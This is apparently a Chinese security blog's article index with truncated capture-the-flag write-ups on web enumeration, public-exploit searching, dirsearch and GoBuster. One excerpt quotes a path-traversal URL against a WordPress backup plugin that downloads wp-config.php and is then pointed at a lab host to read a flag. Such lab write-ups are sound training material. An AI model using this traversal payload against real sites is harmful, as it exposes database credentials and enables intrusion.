每日一练

问题解题访问web,发现存在插件搜索公共漏洞,得到poc:[站点]/[路径]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php修改poc,获取flag.txt:83.136.251.235:31002/wp-admin/tools.php?page=backup_manager&download

- 阅读全文 -

公共漏洞利用

一旦我们确定了在扫描中识别的端口上运行的服务,第一步就是查看是否有任何应用程序/服务有任何公共漏洞。方法许多工具可以帮助我们搜索在枚举阶段可能遇到的各种应用程序和服务的公共漏洞。在 Google 上搜索应用程序名称,如:运用工具(用于此目的的一个著名工具是 searchsploit)利用在线漏洞利用数据库来搜索漏洞,例如 Exploit DB、Rapid7 DB 或 Vulnerability L

- 阅读全文 -

一次简单的web枚举夺旗

┌──(root㉿HgTrojan)-[~]└─# dirsearch -u 94.237.56.188:56781/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_norm

- 阅读全文 -

利用GoBuster扫描网站目录

发现 Web 后,我们应该检查一下是否可以在 Web 服务器上发现任何不适合公共访问的隐藏文件或目录。这时我们可以使用 dirsearch 或 GoBuster 等工具来执行此目录枚举。有时我们会发现隐藏的功能或页面/目录暴露敏感数据,这些数据可用于访问 Web 应用程序,甚至是 Web 服务器本身的远程代码执行。介绍GoBuster 是一种多功能工具,允许执行 DNS、虚拟主机和目录暴力破解。该

- 阅读全文 -

热门文章

最新文章

最近回复

分类

标签

归档

其它